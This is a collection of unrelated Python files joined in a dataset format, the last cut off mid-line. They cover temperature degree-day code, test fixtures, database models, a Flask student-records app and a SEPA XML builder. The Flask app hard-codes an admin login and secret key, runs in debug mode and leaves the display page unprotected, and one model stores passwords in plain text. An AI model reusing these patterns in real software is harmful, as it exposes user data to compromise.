#!/usr/bin/env python3 import sys import os import logging import numpy as np import pandas as pd import dateutil def tempF2C(x): return (x-32.0)*5.0/9.0 def tempC2F(x): return (x*9.0/5.0)+32.0 def load_temperature_hdf5(temps_fn, local_time_offset, basedir=None, start_year=None, truncate_to_full_day=False): ## Load temperature # temps_fn = "{}_AT_cleaned.h5".format(station_callsign) logging.info("Using saved temperatures file '{}'".format(temps_fn)) if basedir is not None: temps_fn = os.path.join(basedir, temps_fn) tempdf = pd.read_hdf(temps_fn, 'table') tmp = local_time_offset.split(':') tmp = int(tmp[0])*3600+int(tmp[1])*60 sitetz = dateutil.tz.tzoffset(local_time_offset, tmp) tempdf.index = tempdf.index.tz_convert(sitetz) if truncate_to_full_day: x = tempdf.index[-1] if x.hour != 23: x = x-pd.Timedelta(days=1) tmp = '{:04d}-{:02d}-{:02d}'.format(x.year, x.month, x.day) tempdf = tempdf.loc[:tmp] if start_year is not None: tempdf = tempdf.loc['{}-01-01'.format(start_year):] logging.info("Temperature data date range used: {} through {}".format(tempdf.index[0], tempdf.index[-1])) return tempdf def load_temperature_csv(fn, local_time_offset=None): t = pd.read_csv(fn, index_col=0) if local_time_offset is not None: tmp = local_time_offset.split(':') tmp = int(tmp[0])*3600+int(tmp[1])*60 sitetz = dateutil.tz.tzoffset(local_time_offset, tmp) #t.index = pd.to_datetime(t.index).tz_localize('UTC').tz_convert(sitetz) # @TCC this fails if csv contains datetimes with TZ t.index = pd.to_datetime(t.index) try: t.index = t.index.tz_localize('UTC') except TypeError: pass t.index = t.index.tz_convert(sitetz) return t # Function which computes BM (single sine method) degree day generation from temperature data def compute_BMDD_Fs(tmin, tmax, base_temp, dd_gen): # Used internally def _compute_daily_BM_DD(mint, maxt, avet, base_temp): """Use the standard Baskerville-Emin (single sine) degree-day method to compute the degree-day value for a single day. 
""" if avet is None: avet = (mint+maxt)/2.0 # simple midpoint (like in the refs) dd = np.nan # value which we're computing # Step 1: Adjust for observation time; not relevant # Step 2: GDD = 0 if max < base (curve all below base) if maxt < base_temp: dd = 0 # Step 3: Calc mean temp for day; already done previously # Step 4: min > base; then whole curve counts elif mint >= base_temp: dd = avet - base_temp # Step 5: else use curve minus part below base else: W = (maxt-mint)/2.0 tmp = (base_temp-avet) / W if tmp < -1: print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp)) tmp = -1 if tmp > 1: print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp)) tmp = 1 A = np.arcsin(tmp) dd = ((W*np.cos(A))-((base_temp-avet)*((np.pi/2.0)-A)))/np.pi return dd # compute the degree-days for each day in the temperature input (from tmin and tmax vectors) dd = pd.concat([tmin,tmax], axis=1) dd.columns = ['tmin', 'tmax'] dd['DD'] = dd.apply(lambda x: _compute_daily_BM_DD(x[0], x[1], (x[0]+x[1])/2.0, base_temp), axis=1) # compute the degree-days for each day in the temperature input (from a daily groupby) # grp = t.groupby(pd.TimeGrouper('D')) # dd = grp.agg(lambda x: _compute_daily_BM_DD(np.min(x), np.max(x), None, base_temp)) # dd.columns = ['DD'] # Find the point where cumulative sums of degree days cross the threshold cDD = dd['DD'].cumsum(skipna=True) for cumdd_threshold,label in [[1*dd_gen,'F1'], [2*dd_gen,'F2'], [3*dd_gen,'F3']]: dtmp = np.zeros(len(dd['DD']))*np.nan tmp = np.searchsorted(cDD, cDD+(cumdd_threshold)-dd['DD'], side='left').astype(float) tmp[tmp>=len(tmp)] = np.nan #dd[label+'_idx'] = tmp # convert those indexes into end times e = pd.Series(index=dd.index, dtype='float64')#, dtype='datetime64[ns]') #e[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] # @TCC previous code e.loc[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] e.loc[np.isnan(tmp)] = np.nan dd[label+'_end'] = e # and duration... #dd[label] = (e-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) # @TCC previous code dd[label] = (pd.to_datetime(e)-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) #dd.loc[np.isnan(tmp), label] = np.nan print("DD dataframe min values\n", dd.min()) return dd def compute_year_over_year_norm(in_dataframe, start, end, norm_start=None, norm_end=None, freq='daily', interp_method='linear', norm_method='mean'): """ Parameters ---------- start: convertable to Datetime start range of dates to output end: convertable to Datetime end range of dates to output norm_start : convertable to Datetime or None `None` will use in_dataframe.index[0] norm_end : convertable to Datetime or None if given (not None), output range does not include `norm_end` (it is half-open) `None` will use in_dataframe.index[-1] freq : {'daily', 'hourly'} interp_method : str or None `None` will skip resample and interpolation, so `in_dataframe` must already be daily or hourly (depending on `freq`)! 
norm_method : {'mean', 'median'} """ if freq == 'hourly': hrs = 24 hrs_freq = '1h' elif freq == 'daily': hrs = 1 hrs_freq = '24h' else: raise ValueError("Invalid `freq` argument value: {}".format(freq)) if norm_start is None: norm_start = in_dataframe.index[0] if norm_end is None: norm_end = in_dataframe.index[-1] else: norm_end = pd.to_datetime([norm_end])[0] - pd.Timedelta('1 second') print('Computing using range:', norm_start, 'to', norm_end) if interp_method is None: # skip resample+interpolation (assumes in_dataframe is daily!) t = in_dataframe.loc[norm_start:norm_end] else: # resample and interpolate to get hourly t = in_dataframe.resample(hrs_freq).interpolate(method=interp_method).loc[norm_start:norm_end] if norm_method == 'mean': norm = t.groupby([t.index.month, t.index.day, t.index.hour]).mean().sort_index() elif norm_method == 'median': norm = t.groupby([t.index.month, t.index.day, t.index.hour]).median().sort_index() else: raise ValueError("Unknown norm_method '{}'".format(norm_method)) # now replicate and trim to the desired output range start = pd.to_datetime(start) end = pd.to_datetime(end) # need a non-leapyear and leapyear version norm_ly = norm.copy() if norm.shape[0] == 366*hrs: norm = norm.drop((2,29,)) else: # norm doesn't include any leapyear data assert norm.shape[0] == 365*hrs # make Feb 29 the mean of Feb 28 and Mar 1 foo = (norm.loc[(2,28,)] + norm.loc[(3,1,)]) / 2.0 foo.index = pd.MultiIndex.from_product( ([2],[29],list(range(hrs))) ) norm_ly = pd.concat((norm_ly,foo)).sort_index() norm_ly.sort_index(inplace=True) # probably not needed # build up a 'long normal' (lnorm) dataframe year by year by appending the norm or norm_ly lnorm = None for yr in np.arange(start.year, end.year+1): #print(yr) idx = pd.date_range(start='{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[0]), end= '{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[-1]), freq=hrs_freq) if idx.shape[0] == 366*hrs: foo = norm_ly.copy() else: assert norm.shape[0] == 365*hrs foo = norm.copy() foo.index = idx if lnorm is None: lnorm = foo else: lnorm = pd.concat([lnorm, foo]) # DataFrame.append was removed in pandas 2 return lnorm.loc[start:end]
2.546875
3
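To make the single-sine computation above concrete, a self-contained sketch of the per-day Baskerville-Emin calculation (the base temperature of 10 is an arbitrary choice for the demo):

import numpy as np

def bm_dd(mint, maxt, base):
    # Mirrors _compute_daily_BM_DD above: three cases depending on where the
    # daily sine curve sits relative to the base temperature.
    avet = (mint + maxt) / 2.0
    if maxt < base:                      # whole curve below base
        return 0.0
    if mint >= base:                     # whole curve above base
        return avet - base
    W = (maxt - mint) / 2.0              # half-amplitude of the sine
    A = np.arcsin(np.clip((base - avet) / W, -1, 1))
    return (W * np.cos(A) - (base - avet) * (np.pi / 2.0 - A)) / np.pi

print(bm_dd(2, 8, 10))    # 0.0
print(bm_dd(12, 20, 10))  # 6.0 (mean minus base)
print(bm_dd(5, 15, 10))   # ~1.59 (only the above-base part counts)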
applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py
lkusch/Kratos
778
1816
# import Kratos import KratosMultiphysics import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication import KratosMultiphysics.CSharpWrapperApplication as CSharpWrapperApplication import run_cpp_unit_tests # Import Kratos "wrapper" for unittests import KratosMultiphysics.KratosUnittest as KratosUnittest # Import subprocess import subprocess # Using kratos_utilities import KratosMultiphysics.kratos_utilities as kratos_utilities if kratos_utilities.CheckIfApplicationsAvailable("ExternalSolversApplication"): has_external_solvers_application = True else: has_external_solvers_application = False # Import the test classes to create the suites ## SMALL TESTS ## NIGHTLY TESTS ## VALIDATION TESTS def AssembleTestSuites(): ''' Populates the test suites to run. At least, it should populate the suites: "small", "nightly" and "all" Return ------ suites: A dictionary of suites The set of suites with their test_cases added. ''' suites = KratosUnittest.KratosSuites # Create a test suite with the selected tests (Small tests): smallSuite = suites['small'] # Create a test suite with the selected tests plus all small tests nightlySuite = suites['nightly'] ### BEGIN SMALL SUITE ### ### END SMALL SUITE ### ### BEGIN NIGHTLY SUITE ### ### END NIGHTLY SUITE ### ### BEGIN VALIDATION SUITE ### # For very long tests that should not be in nightly; use them to validate validationSuite = suites['validation'] validationSuite.addTests(nightlySuite) ### END VALIDATION SUITE ### # Create a test suite that contains all the tests: allSuite = suites['all'] allSuite.addTests(nightlySuite) # Already contains the smallSuite validationSuite.addTests(allSuite) # Validation contains all # Manual list for debugging #allSuite.addTests( #KratosUnittest.TestLoader().loadTestsFromTestCases([ #### STANDALONE #### SMALL #### NIGHTLY #### VALIDATION #]) #) return suites if __name__ == '__main__': KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning cpp unit tests ...") run_cpp_unit_tests.run() KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished running cpp unit tests!") KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning python tests ...") KratosUnittest.runTests(AssembleTestSuites()) KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished python tests!")
2.1875
2
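The suite markers above are empty placeholders; following the commented-out pattern at the bottom of the file, registering a test class would look like the sketch below (TestExample is a hypothetical name, not a real Kratos test case):

smallSuite.addTests(
    KratosUnittest.TestLoader().loadTestsFromTestCases([TestExample]))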
backend/api/models.py
mezidia/mezidia-airlines-backend
0
1817
<reponame>mezidia/mezidia-airlines-backend<filename>backend/api/models.py from sqlalchemy import Column, Integer, String, ForeignKey, Float from sqlalchemy.orm import relationship from .database import Base class Post(Base): __tablename__ = "posts" id = Column(Integer, primary_key=True, nullable=False, index=True) full_name = Column(String, nullable=False) last_place = Column(String, nullable=False) description = Column(String, nullable=False) percentage = Column(Float, default=0.0) image = Column(String) owner_id = Column(Integer, ForeignKey("users.id")) creator = relationship("User", back_populates="posts") class User(Base): __tablename__ = "users" id = Column(Integer, primary_key=True, nullable=False, index=True) name = Column(String, nullable=False) email = Column(String, nullable=False, unique=True) password = Column(String, nullable=False) phone_number = Column(String, nullable=False) posts = relationship("Post", back_populates="creator") class Code(Base): __tablename__ = "codes" id = Column(Integer, primary_key=True, nullable=False, index=True) code = Column(Integer, nullable=False)
2.84375
3
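A short usage sketch for the models above, assuming the declarative Base they import can be bound to a throwaway in-memory SQLite engine:

from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

engine = create_engine('sqlite://')   # in-memory database for the demo
Base.metadata.create_all(engine)      # Base, User, Post as defined above
session = sessionmaker(bind=engine)()

user = User(name='Ada', email='ada@example.com', password='hashed',
            phone_number='555-0100')
post = Post(full_name='Lost bag', last_place='Gate 4',
            description='Black suitcase', creator=user)
session.add(user)   # the related Post is cascaded on commit
session.commit()
print(user.posts[0].last_place)  # 'Gate 4' via the back_populates relationship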
run.py
Ganeshrockz/Flask-Python-Dev
0
1818
<reponame>Ganeshrockz/Flask-Python-Dev<filename>run.py from flask import Flask, flash, render_template, redirect, url_for from flask_pymongo import PyMongo # the flask.ext namespace was removed in Flask 1.0 from flask import request app=Flask(__name__) app.config['MONGO_DBNAME']='stud' app.config['MONGO_URI']='mongodb://localhost:27017/stud' mongo=PyMongo(app) """ @app.route('/add') def add(): user=mongo.db.users user.insert({"name":"Ganesh","age":19}) return "Added" @app.route('/find') def find(): user=mongo.db.users data=user.find_one({"name":"Ganesh"}) return data["name"] """ @app.route('/',methods=['GET', 'POST']) def dashboard(): if request.method == 'POST': name=request.form['name'] passw=request.form['password'] if name=="admin123" and passw=="<PASSWORD>": return redirect(url_for('display')) else: return render_template("dashboard.html",err="Login Failed") else: return render_template("dashboard.html") @app.route('/form',methods=['GET', 'POST']) def form(): if request.method == 'POST': user=mongo.db.student rollno=request.form['rollno'] name=request.form['name'] address=request.form['address'] year=request.form['year'] skills=request.form['skills'] phone=request.form['phone'] email=request.form['emailid'] user.insert({"Rollnumber":rollno,"StudentName":name,"Address":address,"Year":year,"Skills":skills,"PhoneNumber":phone,"EmailId":email}) return redirect(url_for('dashboard')) else: return render_template("form.html") @app.route('/display',methods=['GET', 'POST']) def display(): data=mongo.db.student record=[] for rec in data.find(): record.append({"Rollnumber":rec["Rollnumber"],"StudentName":rec["StudentName"],"Address":rec["Address"],"Year":rec["Year"],"Skills":rec["Skills"],"PhoneNumber":rec["PhoneNumber"],"EmailId":rec["EmailId"]}) app.logger.info(record) return render_template("display.html", studentdata=record) if __name__ == '__main__': app.secret_key = 'ganeshrockz' app.run(debug=True)
2.859375
3
resources/tests/conftest.py
jussiarpalahti/respa
0
1819
# -*- coding: utf-8 -*- import pytest import datetime from django.contrib.auth import get_user_model from django.contrib.auth.models import Group from rest_framework.test import APIClient, APIRequestFactory from resources.enums import UnitAuthorizationLevel from resources.models import Resource, ResourceType, Unit, Purpose, Day, Period from resources.models import Equipment, EquipmentAlias, ResourceEquipment, EquipmentCategory, TermsOfUse, ResourceGroup from resources.models import AccessibilityValue, AccessibilityViewpoint, ResourceAccessibility, UnitAccessibility from munigeo.models import Municipality @pytest.fixture def api_client(): return APIClient() @pytest.fixture def staff_api_client(staff_user): api_client = APIClient() api_client.force_authenticate(user=staff_user) return api_client @pytest.fixture def user_api_client(user): api_client = APIClient() api_client.force_authenticate(user=user) return api_client @pytest.fixture(params=[None, 'user', 'staff_user']) def all_user_types_api_client(request): api_client = APIClient() if request.param: api_client.force_authenticate(request.getfixturevalue(request.param)) return api_client @pytest.fixture def api_rf(): return APIRequestFactory() @pytest.mark.django_db @pytest.fixture def space_resource_type(): return ResourceType.objects.get_or_create(id="test_space", name="test_space", main_type="space")[0] @pytest.mark.django_db @pytest.fixture def space_resource(space_resource_type): return Resource.objects.create(type=space_resource_type, authentication="none", name="resource") @pytest.mark.django_db @pytest.fixture def test_unit(): return Unit.objects.create(name="unit", time_zone='Europe/Helsinki') @pytest.fixture def test_unit2(): return Unit.objects.create(name="unit 2", time_zone='Europe/Helsinki') @pytest.fixture def test_unit3(): return Unit.objects.create(name="unit 3", time_zone='Europe/Helsinki') @pytest.fixture def terms_of_use(): return TermsOfUse.objects.create( name_fi='testikäyttöehdot', name_en='test terms of use', text_fi='kaikki on kielletty', text_en='everything is forbidden', ) @pytest.mark.django_db @pytest.fixture def resource_in_unit(space_resource_type, test_unit, terms_of_use): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit", unit=test_unit, max_reservations_per_user=1, max_period=datetime.timedelta(hours=2), reservable=True, generic_terms=terms_of_use, specific_terms_fi='spesifiset käyttöehdot', specific_terms_en='specific terms of use', reservation_confirmed_notification_extra_en='this resource rocks' ) @pytest.mark.django_db @pytest.fixture def resource_in_unit2(space_resource_type, test_unit2): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit 2", unit=test_unit2, max_reservations_per_user=2, max_period=datetime.timedelta(hours=4), reservable=True, ) @pytest.mark.django_db @pytest.fixture def resource_in_unit3(space_resource_type, test_unit3): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit 3", unit=test_unit3, max_reservations_per_user=2, max_period=datetime.timedelta(hours=4), reservable=True, ) @pytest.mark.django_db @pytest.fixture def resource_with_opening_hours(resource_in_unit): p1 = Period.objects.create(start=datetime.date(2115, 1, 1), end=datetime.date(2115, 12, 31), resource=resource_in_unit, name='regular hours') for weekday in range(0, 7): Day.objects.create(period=p1, weekday=weekday, opens=datetime.time(8, 0), 
closes=datetime.time(18, 0)) resource_in_unit.update_opening_hours() return resource_in_unit @pytest.mark.django_db @pytest.fixture def exceptional_period(resource_with_opening_hours): parent = resource_with_opening_hours.periods.first() period = Period.objects.create(start='2115-01-10', end='2115-01-12', resource=resource_with_opening_hours, name='exceptional hours', exceptional=True, parent=parent) date = period.start Day.objects.create(period=period, weekday=date.weekday(), closed=True) date = date + datetime.timedelta(days=1) Day.objects.create(period=period, weekday=date.weekday(), opens='12:00', closes='13:00') date = date + datetime.timedelta(days=1) Day.objects.create(period=period, weekday=date.weekday(), closed=True) return period @pytest.mark.django_db @pytest.fixture def equipment_category(): return EquipmentCategory.objects.create( name='test equipment category' ) @pytest.mark.django_db @pytest.fixture def equipment(equipment_category): equipment = Equipment.objects.create(name='test equipment', category=equipment_category) return equipment @pytest.mark.django_db @pytest.fixture def equipment_alias(equipment): equipment_alias = EquipmentAlias.objects.create(name='test equipment alias', language='fi', equipment=equipment) return equipment_alias @pytest.mark.django_db @pytest.fixture def resource_equipment(resource_in_unit, equipment): data = {'test_key': 'test_value'} resource_equipment = ResourceEquipment.objects.create( equipment=equipment, resource=resource_in_unit, data=data, description='test resource equipment', ) return resource_equipment @pytest.mark.django_db @pytest.fixture def user(): return get_user_model().objects.create( username='test_user', first_name='Cem', last_name='Kaner', email='<EMAIL>', preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def user2(): return get_user_model().objects.create( username='test_user2', first_name='Brendan', last_name='Neutra', email='<EMAIL>' ) @pytest.mark.django_db @pytest.fixture def staff_user(): return get_user_model().objects.create( username='test_staff_user', first_name='John', last_name='Staff', email='<EMAIL>', is_staff=True, preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def unit_manager_user(resource_in_unit): user = get_user_model().objects.create( username='test_manager_user', first_name='Inspector', last_name='Lestrade', email='<EMAIL>', is_staff=True, preferred_language='en' ) user.unit_authorizations.create(subject=resource_in_unit.unit, level=UnitAuthorizationLevel.manager) return user @pytest.mark.django_db @pytest.fixture def general_admin(): return get_user_model().objects.create( username='test_general_admin', first_name='Genie', last_name='Manager', email='<EMAIL>', is_staff=True, is_general_admin=True, preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def group(): return Group.objects.create(name='test group') @pytest.mark.django_db @pytest.fixture def purpose(): return Purpose.objects.create(name='test purpose', id='test-purpose') @pytest.fixture def resource_group(resource_in_unit): group = ResourceGroup.objects.create( identifier='test_group', name='Test resource group' ) group.resources.set([resource_in_unit]) return group @pytest.fixture def resource_group2(resource_in_unit2): group = ResourceGroup.objects.create( identifier='test_group_2', name='Test resource group 2' ) group.resources.set([resource_in_unit2]) return group @pytest.fixture def test_municipality(): municipality = Municipality.objects.create( id='foo', name='Foo' ) return municipality 
@pytest.fixture def accessibility_viewpoint_wheelchair(): vp = {"id": "10", "name_en": "I am a wheelchair user", "order_text": 10} return AccessibilityViewpoint.objects.create(**vp) @pytest.fixture def accessibility_viewpoint_hearing(): vp = {"id": "20", "name_en": "I am hearing impaired", "order_text": 20} return AccessibilityViewpoint.objects.create(**vp) @pytest.fixture def accessibility_value_green(): return AccessibilityValue.objects.create(value='green', order=10) @pytest.fixture def accessibility_value_red(): return AccessibilityValue.objects.create(value='red', order=-10) @pytest.fixture def resource_with_accessibility_data(resource_in_unit, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is wheelchair accessible, not hearing accessible, unit is accessible to both """ ResourceAccessibility.objects.create( resource=resource_in_unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) ResourceAccessibility.objects.create( resource=resource_in_unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_red ) UnitAccessibility.objects.create( unit=resource_in_unit.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) return resource_in_unit @pytest.fixture def resource_with_accessibility_data2(resource_in_unit2, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is hearing accessible, not wheelchair accessible, unit is accessible to both """ ResourceAccessibility.objects.create( resource=resource_in_unit2, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_red ) ResourceAccessibility.objects.create( resource=resource_in_unit2, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit2.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit2.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) return resource_in_unit2 @pytest.fixture def resource_with_accessibility_data3(resource_in_unit3, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is accessible, unit is not """ ResourceAccessibility.objects.create( resource=resource_in_unit3, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) ResourceAccessibility.objects.create( resource=resource_in_unit3, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit3.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_red ) UnitAccessibility.objects.create( unit=resource_in_unit3.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_red ) return resource_in_unit3
1.90625
2
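A hedged example of a test built on the fixtures above; the endpoint path is a guess for illustration, not taken from the project's URL configuration:

import pytest

@pytest.mark.django_db
def test_resource_detail_is_visible(user_api_client, resource_in_unit):
    # user_api_client is pre-authenticated; resource_in_unit is reservable.
    response = user_api_client.get('/v1/resource/%s/' % resource_in_unit.pk)
    assert response.status_code == 200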
qcmetadataprinter/struct.py
x2dev/device_leeco_x2
0
1820
<reponame>x2dev/device_leeco_x2 #!/usr/bin/env python3 with open('../camera/QCamera2/stack/common/cam_intf.h', 'r') as f: data = f.read() # the with-block closes the file; the original stray `f.closed` no-op is dropped start = data.find(' INCLUDE(CAM_INTF_META_HISTOGRAM') end = data.find('} metadata_data_t;') data = data[start:end] metadata = data.split("\n") metalist = list() for line in metadata: if (line.startswith(' INCLUDE')): foo = line.split(',') foo[0] = foo[0].replace('INCLUDE', 'PRINT') metalist.append(foo[0] + ", pMetadata);") with open('list.txt', 'w') as f: for item in metalist: f.write("%s\n" % item)
2.359375
2
abc/abc121/abc121d-2.py
c-yan/atcoder
1
1821
<reponame>c-yan/atcoder def g(A, n): if A == -1: return 0 return A // (2 * n) * n + max(A % (2 * n) - (n - 1), 0) def f(A, B): result = 0 for i in range(48): t = 1 << i if (g(B, t) - g(A - 1, t)) % 2 == 1: result += t return result A, B = map(int, input().split()) print(f(A, B))
2.65625
3
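The solution above evaluates f(A, B), the XOR of all integers in [A, B], bit by bit: g(X, t) counts how many of 0..X have the bit worth t set, so the parity of g(B, t) - g(A - 1, t) decides whether bit t survives. A brute-force cross-check for small ranges, with f and g as defined above:

from functools import reduce

def xor_range(a, b):
    # Direct fold, only feasible for small ranges.
    return reduce(lambda x, y: x ^ y, range(a, b + 1), 0)

assert all(f(a, b) == xor_range(a, b)
           for a in range(50) for b in range(a, 50))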
log_mysql.py
kizunai/Weather-Scrapy
0
1822
<reponame>kizunai/Weather-Scrapy import logging from logging.handlers import TimedRotatingFileHandler class MyLog(): def __init__(self, name, filename): self.logger = logging.getLogger(name) if not self.logger.handlers: self.logger.setLevel(logging.INFO) ch = TimedRotatingFileHandler(filename=filename, when='midnight', encoding="utf-8") ch.setLevel(logging.DEBUG) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') ch.setFormatter(formatter) self.logger.addHandler(ch) ''' logger = MyLog("test","log\\text.txt") logger.logger.debug('debug message') logger.logger.info('info message') logger.logger.warning('warn message') logger.logger.error('error message') logger.logger.critical('critical message') '''
2.859375
3
src/fiesta/urls.py
lerooze/django-fiesta
0
1823
<gh_stars>0 # urls.py from django.urls import path, register_converter from fiesta import converters from fiesta.views import views from rest_framework.urlpatterns import format_suffix_patterns # "http://django-sdmx.org/wsrest/" # "http://django-sdmx.org/ws/" register_converter(converters.ResourceConverter, 'res') register_converter(converters.AgencyConverter, 'age') register_converter(converters.ContextConverter, 'con') urlpatterns = [ path('wsreg/SubmitStructure/', views.SubmitStructureRequestView.as_view()), path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>', views.SDMXRESTfulSchemaView.as_view()), path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>/<str:version>', views.SDMXRESTfulSchemaView.as_view()), path('wsrest/<res:resource>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/' '<str:version>/', views.SDMXRESTfulStructureView.as_view()), ] urlpatterns = format_suffix_patterns(urlpatterns)
2.03125
2
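For context on the register_converter calls above: a Django path converter is just a class with a regex attribute and to_python/to_url methods. A hypothetical stand-in for ResourceConverter (the actual pattern lives in fiesta.converters):

class ResourceConverter:
    # Invented example set; the real one enumerates SDMX resource names.
    regex = 'datastructure|codelist|conceptscheme'

    def to_python(self, value):
        return value

    def to_url(self, value):
        return value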
code-wars/010.moving-zeros-to-the-end.py
code-knayam/DataStructureAlgorithms
0
1824
<filename>code-wars/010.moving-zeros-to-the-end.py # Write an algorithm that takes an array and moves all of the zeros to the end, preserving the order of the other elements. def move_zeros(array): # NB: False == 0 in Python, so booleans are explicitly excluded from the zero check new_array = [] new_index = 0 while len(array) > 0: item = array.pop(0) if item == 0 and type(item) is not bool: new_array.append(item) # zeros collect at the end else: new_array.insert(new_index, item) # everything else keeps its relative order new_index = new_index + 1 return new_array
4
4
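The type check in move_zeros above matters because False == 0 in Python; a quick check of the intended behavior:

# False keeps its position; numeric zeros move to the end.
print(move_zeros([False, 1, 0, 1, 2, 0, 1, 3, 'a']))
# -> [False, 1, 1, 2, 1, 3, 'a', 0, 0]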
sepa_generator/definitions.py
jason-gm/python_sepa
0
1825
def construct_tag_data(tag_name, attrs=None, value=None, sorting=None): data = { '_name': tag_name, '_attrs': attrs or [], '_value': value, } if sorting: data['_sorting'] = sorting return data def add_simple_child(data, child_friendly_name, child_tag_name, child_attrs=None, child_value=None): data[child_friendly_name] = construct_tag_data(child_tag_name, child_attrs, child_value) return data def construct_header(ctransfer): header = construct_tag_data('GrpHdr') header['_sorting'] = ['MsgId', 'CreDtTm', 'NbOfTxs', 'CtrlSum', 'InitgPty'] header['message_id'] = construct_tag_data('MsgId', value=ctransfer.uuid) header['creation_date_time'] = construct_tag_data('CreDtTm', value=ctransfer.timestamp) header['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions()) header['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum()) header['initiating_party'] = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [], ctransfer.debtor.name) return header def construct_iban(account, tag_name): iban_data = construct_tag_data(tag_name) iban_data['id'] = add_simple_child(construct_tag_data('Id'), 'iban', 'IBAN', [], account.iban) return iban_data def construct_bic(account, tag_name): bic_data = construct_tag_data(tag_name) bic_data['financial_instrument_id'] = add_simple_child(construct_tag_data('FinInstnId'), 'bic', 'BIC', [], account.bic) return bic_data def construct_address_data(account, tag_name): addr_data = construct_tag_data(tag_name) addr_data['name'] = construct_tag_data('Nm', value=account.name) if account.has_address(): address = construct_tag_data('PstlAdr') if account.country: address['country'] = construct_tag_data('Ctry', value=account.country) if account.street: address['addr_line_1'] = construct_tag_data('AdrLine', value=account.street) if account.postcode and account.city: address['addr_line_2'] = construct_tag_data('AdrLine', value="%s %s" % (account.postcode, account.city)) addr_data['address'] = address return addr_data def construct_transaction_data(ctransfer, transaction): transaction_information = construct_tag_data('CdtTrfTxInf') transaction_information['_sorting'] = ['PmtId', 'Amt', 'ChrgBr', 'UltmtDbtr', 'CdtrAgt', 'Cdtr', 'CdtrAcct', 'UltmtCdtr', 'Purp', 'RmtInf'] transaction_information['payment_id'] = add_simple_child( data=add_simple_child(data=construct_tag_data('PmtId', sorting=['InstrId', 'EndToEndId']), child_friendly_name='instruction', child_tag_name='InstrId', child_value=transaction.uuid), child_friendly_name='eref', child_tag_name='EndToEndId', child_value=transaction.eref) transaction_information['amount'] = add_simple_child(data=construct_tag_data('Amt'), child_friendly_name='amount', child_tag_name='InstdAmt', child_attrs=[('Ccy', ctransfer.currency)], child_value=transaction.get_amount()) transaction_information['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV') if ctransfer.debtor.use_ultimate: transaction_information['ultimate_debtor'] = add_simple_child(data=construct_tag_data('UltmtDbtr'), child_friendly_name='name', child_tag_name='Nm', child_value=ctransfer.debtor.name) transaction_information['creditor_agent'] = construct_bic(transaction.creditor, 'CdtrAgt') transaction_information['creditor_data'] = construct_address_data(transaction.creditor, 'Cdtr') transaction_information['creditor_account'] = construct_iban(transaction.creditor, 'CdtrAcct') if transaction.creditor.use_ultimate: transaction_information['ultimate_creditor'] = 
